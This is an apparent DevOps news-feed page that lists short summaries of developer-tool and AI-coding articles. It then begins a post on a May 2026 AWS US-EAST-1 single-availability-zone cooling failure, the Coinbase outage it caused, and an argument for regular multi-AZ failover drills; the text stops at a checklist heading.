          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-cloud-ciso-perspectives-how-google-wiz-changes-multicloud-strategy-for-cisos"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Welcome to the first Cloud CISO Perspectives for May 2026. Today, Vinod D’Souza, director, Office of the CISO, shares highlights from his RSA Conference fireside chat with Anthony Belfiore, chief stra</p>
<p><strong>📅 May 14, 2026</strong> • <strong>📰 Google Cloud Blog</strong></p>
<p><a href="https://cloud.google.com/blog/products/identity-security/cloud-ciso-perspectives-how-google-wiz-changes-multicloud-strategy-for-cisos/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-misc" class="group relative scroll-mt-24">
        <a href="#h2-misc" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📰 Misc
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-misc"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-visual-studio-code-1121" class="group relative scroll-mt-24">
        <a href="#h3-visual-studio-code-1121" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Visual Studio Code 1.121
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-visual-studio-code-1121"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Learn what&#39;s new in Visual Studio Code 1.121 (Insiders) Read the full article</p>
<p><strong>📅 May 20, 2026</strong> • <strong>📰 VS Code Blog</strong></p>
<p><a href="https://code.visualstudio.com/updates/v1_121"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-mac-mini-just-became-infrastructure" class="group relative scroll-mt-24">
        <a href="#h3-the-mac-mini-just-became-infrastructure" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Mac mini just became infrastructure
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-the-mac-mini-just-became-infrastructure"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>On April 30, Apple’s Q2 2026 earnings call did something unusual. Tim Cook spent meaningful airtime on Mac mini and The post The Mac mini just became infrastructure appeared first on The New Stack.</p>
<p><strong>📅 May 17, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/mac-mini-agent-infrastructure/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-clean-up-cost-of-ai-generated-code-is-what-the-velocity-narrative-leaves-out" class="group relative scroll-mt-24">
        <a href="#h3-the-clean-up-cost-of-ai-generated-code-is-what-the-velocity-narrative-leaves-out" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The clean-up cost of AI-generated code is what the velocity narrative leaves out
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-the-clean-up-cost-of-ai-generated-code-is-what-the-velocity-narrative-leaves-out"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>The world is actively using AI to make our lives more efficient and safe — from creative writing to safer The post The clean-up cost of AI-generated code is what the velocity narrative leaves out appe</p>
<p><strong>📅 May 16, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/cleanup-cost-ai-code/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-github-takes-aim-at-claude-code-and-codex-with-its-new-copilot-app" class="group relative scroll-mt-24">
        <a href="#h3-github-takes-aim-at-claude-code-and-codex-with-its-new-copilot-app" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 GitHub takes aim at Claude Code and Codex with its new Copilot app
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-github-takes-aim-at-claude-code-and-codex-with-its-new-copilot-app"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>GitHub’s latest move to shake up its Copilot coding assistant is to give it its very own home in a The post GitHub takes aim at Claude Code and Codex with its new Copilot app appeared first on The New</p>
<p><strong>📅 May 16, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/github-copilot-desktop-app/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-forward-deployed-engineer-is-ais-hottest-job-as-openai-and-google-race-to-hire-heres-how-to-become-one" class="group relative scroll-mt-24">
        <a href="#h3-forward-deployed-engineer-is-ais-hottest-job-as-openai-and-google-race-to-hire-heres-how-to-become-one" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Forward deployed engineer is AI’s hottest job as OpenAI and Google race to hire. Here’s how to become one.
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-forward-deployed-engineer-is-ais-hottest-job-as-openai-and-google-race-to-hire-heres-how-to-become-one"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>I’m Matt Burns, Chief Content Officer at Insight Media Group. Each week, I round up the most important AI developments, The post Forward deployed engineer is AI’s hottest job as OpenAI and Google race</p>
<p><strong>📅 May 16, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/forward-deployed-engineer-fde-openai-google/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-why-devops-is-critical-for-modern-business-resilience" class="group relative scroll-mt-24">
        <a href="#h3-why-devops-is-critical-for-modern-business-resilience" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Why DevOps Is Critical for Modern Business Resilience
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-why-devops-is-critical-for-modern-business-resilience"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Today’s business world operates in a state of constant change. What the customer wants to buy changes quickly, new competitors appear overnight, and cyber threats are changing faster than ever. In thi</p>
<p><strong>📅 May 15, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/why-devops-is-critical-for-modern-business-resilience/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-pyrefly-lsp-integration-with-type-engine-in-pycharm-202612" class="group relative scroll-mt-24">
        <a href="#h3-pyrefly-lsp-integration-with-type-engine-in-pycharm-202612" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Pyrefly LSP Integration with Type Engine in PyCharm 2026.1.2
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-pyrefly-lsp-integration-with-type-engine-in-pycharm-202612"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>In PyCharm 2026.1.2, you can enable Pyrefly as an external type provider, dramatically increasing the speed of the IDE’s code insight features. What is the Pyrefly LSP? “LSP” stands for the Language S</p>
<p><strong>📅 May 15, 2026</strong> • <strong>📰 JetBrains Blog</strong></p>
<p><a href="https://blog.jetbrains.com/pycharm/2026/05/pyrefly-lsp-integration-in-pycharm-2026-1-2"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-intellij-idea-202612-is-out" class="group relative scroll-mt-24">
        <a href="#h3-intellij-idea-202612-is-out" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 IntelliJ IDEA 2026.1.2 Is Out!
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-intellij-idea-202612-is-out"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>IntelliJ IDEA 2026.1.2 has arrived with several valuable fixes. You can update to this version from inside the IDE, using the Toolbox App, or using snaps if you are a Ubuntu user. You can also downloa</p>
<p><strong>📅 May 15, 2026</strong> • <strong>📰 JetBrains Blog</strong></p>
<p><a href="https://blog.jetbrains.com/idea/2026/05/intellij-idea-2026-1-2"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-a-new-default-project-structure-for-kotlin-multiplatform" class="group relative scroll-mt-24">
        <a href="#h3-a-new-default-project-structure-for-kotlin-multiplatform" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 A New Default Project Structure for Kotlin Multiplatform
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-a-new-default-project-structure-for-kotlin-multiplatform"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>We are updating the default project structure for Kotlin Multiplatform projects to give modules clearer responsibilities, better align with conventions used by other build systems and frameworks, and </p>
<p><strong>📅 May 15, 2026</strong> • <strong>📰 JetBrains Blog</strong></p>
<p><a href="https://blog.jetbrains.com/kotlin/2026/05/new-kmp-default-structure"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-help-shape-the-future-of-kotlin-in-the-age-of-ai" class="group relative scroll-mt-24">
        <a href="#h3-help-shape-the-future-of-kotlin-in-the-age-of-ai" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Help Shape the Future of Kotlin in the Age of AI
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-help-shape-the-future-of-kotlin-in-the-age-of-ai"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>AI is rapidly changing the way developers write, review, learn, and maintain code. Code completion, AI chat assistants, autonomous coding agents, and other tools are giving rise to new workflows almos</p>
<p><strong>📅 May 15, 2026</strong> • <strong>📰 JetBrains Blog</strong></p>
<p><a href="https://blog.jetbrains.com/kotlin/2026/05/help-shape-the-future-of-kotlin-in-the-age-of-ai"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-xai-enters-the-coding-agent-race-with-grok-build" class="group relative scroll-mt-24">
        <a href="#h3-xai-enters-the-coding-agent-race-with-grok-build" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 xAI Enters the Coding Agent Race With Grok Build
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-xai-enters-the-coding-agent-race-with-grok-build"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Elon Musk&#39;s xAI has entered the developer workspace with Grok Build, a local-first coding agent featuring an automated &quot;Arena Mode&quot; that runs and ranks parallel AI outputs to rival Anthropic and OpenA</p>
<p><strong>📅 May 15, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/xai-enters-the-coding-agent-race-with-grok-build/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-open-source-procurement-agenda-a-guide-for-it-leaders-procurement-teams-and-policymakers" class="group relative scroll-mt-24">
        <a href="#h3-the-open-source-procurement-agenda-a-guide-for-it-leaders-procurement-teams-and-policymakers" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Open Source Procurement Agenda: A Guide for IT Leaders, Procurement Teams and Policymakers
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-the-open-source-procurement-agenda-a-guide-for-it-leaders-procurement-teams-and-policymakers"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>This five-part series from SUSE’s Sovereign Solutions Team, published ahead of the upcoming EU Tech Sovereignty Package, equips IT leaders, procurement professionals, and policymakers with the practic</p>
<p><strong>📅 May 15, 2026</strong> • <strong>📰 SUSE Blog</strong></p>
<p><a href="https://www.suse.com/c/the-open-source-procurement-agenda-a-guide-for-it-leaders-procurement-teams-and-policymakers/"><strong>🔗 Read more</strong></a></p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[When One Data Center Room Got Hot: AWS US-EAST-1, Coinbase, and the DR Drill That Was Not]]></title>
      <link>https://devops-daily.com/posts/aws-use1-az4-thermal-event-single-az-lessons</link>
      <description><![CDATA[On May 7, 2026, cooling failed in a single hall of one US-EAST-1 data center. Coinbase, FanDuel, and CME Group went down for hours, and Coinbase publicly confirmed their backup systems did not work as expected. Here is what happened, the multi-AZ checklist that would have caught it, and the AWS Fault Injection Simulator commands to run the drill before the next thermal event.]]></description>
      <pubDate>Fri, 15 May 2026 15:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/aws-use1-az4-thermal-event-single-az-lessons</guid>
      <category><![CDATA[AWS]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[AWS]]></category><category><![CDATA[Reliability]]></category><category><![CDATA[Disaster Recovery]]></category><category><![CDATA[Incident Response]]></category><category><![CDATA[Cloud]]></category>
      <content:encoded><![CDATA[<p>At 17:25 PDT on Thursday, May 7, 2026, the cooling in one data center hall inside AWS US-EAST-1 started failing. Temperature climbed. Within minutes, AWS lost power on the affected racks and published the first status update warning that EC2 instances and EBS volumes in <code>use1-az4</code> were impaired. Twenty-plus hours later, at 13:50 PT on May 8, cooling was finally stabilised and most affected resources were recovered.</p>
<p>In between, more than 150 cloud services reported issues. Coinbase&#39;s primary exchange was offline for over five hours during its Q1 earnings day. FanDuel and CME Group both took multi-hour hits to trading. Coinbase&#39;s Head of Platform <a href="https://www.benzinga.com/crypto/26/05/52433912/coinbase-says-aws-cooling-failure-crashed-exchange-during-turbulent-week-ceo-brian-armstrong-calls-it-never-acceptable">stated publicly</a> that the matching engine and Kafka pipeline run pinned to a single AZ to keep latency down, and that the backup systems &quot;did not work as expected during the incident, extending the outage and forcing engineers to manually execute disaster recovery procedures.&quot;</p>
<p>That sentence is the entire post. If you operate anything on AWS that matters, the rest of this article exists to make sure your team is not the one writing that sentence next quarter.</p>
<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TL;DR
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-tldr"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ul>
<li>A thermal event in <strong>one hall</strong> of <strong>one data center</strong> in <strong>one AZ</strong> (<code>use1-az4</code>) took down core services at Coinbase, FanDuel, and CME Group for hours. None of those companies are small or sloppy.</li>
<li>Multi-AZ is not a checkbox. It is a property you can only verify by killing an AZ on purpose and confirming everything stays up. AWS provides <a href="https://aws.amazon.com/fis/">Fault Injection Simulator (FIS)</a> to do this safely.</li>
<li>Single-AZ-for-latency is sometimes the right call. If you make that call, the cost is a hot standby that an engineer can promote in under five minutes with no thinking, plus a quarterly drill that proves the promotion actually works.</li>
<li>EBS volumes on physically damaged racks are not recoverable. Cross-AZ snapshots are not optional and are not a substitute for a working replica.</li>
<li>Coinbase&#39;s incident is the textbook example of &quot;we had a DR plan, we just had not run it under realistic single-AZ loss.&quot; That gap is the thing to fix this quarter.</li>
</ul>
<h2 id="h2-prerequisites" class="group relative scroll-mt-24">
        <a href="#h2-prerequisites" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Prerequisites
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-prerequisites"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ul>
<li>An AWS account running anything that handles real money or real users.</li>
<li>Permission to create IAM roles and FIS experiment templates, or the ability to ask someone who does.</li>
<li>Honesty about whether the last successful DR drill actually killed a primary, or just took a snapshot.</li>
</ul>
<h2 id="h2-what-happened-technically" class="group relative scroll-mt-24">
        <a href="#h2-what-happened-technically" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What happened, technically
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-what-happened-technically"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The official AWS communication during the incident gives the cleanest timeline. AWS first noted the issue at 00:25 UTC on May 8 (<a href="https://www.theregister.com/off-prem/2026/05/08/aws-warns-of-ec2-impairment-as-power-loss-hits-notorious-us-east-1-region/5235509">17:25 PDT May 7</a>). The wording was specific: &quot;EC2 instances and EBS volumes hosted on impacted hardware are affected by the loss of power during the thermal event.&quot; By 01:47 UTC AWS added that &quot;Other AWS services that depend on the affected EC2 instances and EBS volumes in this Availability Zone may also experience impairments,&quot; which is the standard signal that the blast radius is now broader than just compute and block storage.</p>
<p>By 03:06 UTC AWS <a href="https://aws.amazon.com/premiumsupport/technology/pes/">recommended</a> that &quot;customers needing immediate recovery restore from EBS snapshots or launch resources in unaffected zones.&quot; That sentence is the operational tell. AWS was effectively telling the world that recovery in <code>use1-az4</code> was going to take hours and that anyone with a working multi-AZ posture should fail away from it now.</p>
<p>Power was restored progressively, but the EBS volumes on the damaged racks did not all come back. AWS&#39;s status thread for the day used the phrase &quot;subset of EBS volumes will require additional time to recover&quot; for the entire morning of May 8, which in plain English means some volumes were lost to physical damage. The customers who recovered cleanly were the ones whose data plane did not depend on <code>use1-az4</code> at all.</p>
<p>Two technical observations worth pinning to a sticky note:</p>
<ol>
<li><strong>An AZ is not an abstraction.</strong> It is a physical place. When a hall overheats, the racks inside it can be physically damaged. &quot;Multi-AZ&quot; exists because that is the failure mode AWS designs around. The CDR pattern that pretends an AZ is just a logical label is wrong about the world.</li>
<li><strong>The &quot;EBS volumes on damaged hardware&quot; language is the worst-case wording in AWS&#39;s playbook.</strong> It means restore from snapshot, not wait for the volume. If your runbook says &quot;wait for the AZ to come back&quot;, your runbook does not handle this incident.</li>
</ol>
<h2 id="h2-the-coinbase-specifics" class="group relative scroll-mt-24">
        <a href="#h2-the-coinbase-specifics" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The Coinbase specifics
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-coinbase-specifics"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p><a href="https://www.coindesk.com/business/2026/05/08/coinbase-disruption-tied-to-aws-outage-draws-criticism-amid-staff-layoffs-and-q1-losses">Coinbase&#39;s Head of Platform, Rob Witoff</a>, confirmed three things during the incident:</p>
<ol>
<li>Coinbase&#39;s primary exchange systems run in a <strong>single AZ</strong> to minimise matching-engine latency.</li>
<li>The affected zone hosted parts of the matching engine and the Kafka messaging infrastructure.</li>
<li>Backup systems &quot;did not work as expected during the incident, extending the outage and forcing engineers to manually execute disaster recovery procedures.&quot;</li>
</ol>
<p>None of those choices are dumb on their own. A matching engine at exchange scale is latency-sensitive and there are real reasons to pin it to one AZ. The problem is that single-AZ-for-latency only survives an <code>use1-az4</code> event if the failover into another AZ is a battle-tested one-button operation that an SRE can trigger in the first five minutes of an alert. Coinbase had a backup. The backup did not work. That gap is what cost them five hours.</p>
<p>The pattern is general enough to be worth a name. Call it the <em>&quot;we have a backup&quot;</em> fallacy: the backup exists, but it has never been promoted to primary under real failure conditions, so nobody knows what breaks when it is. The fix is not to write a longer DR doc. The fix is to actually break things on purpose, on a schedule.</p>
<h2 id="h2-the-multi-az-checklist-that-would-have-caught-it" class="group relative scroll-mt-24">
        <a href="#h2-the-multi-az-checklist-that-would-have-caught-it" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The multi-AZ checklist that would have caught it
        </a>
        <button 
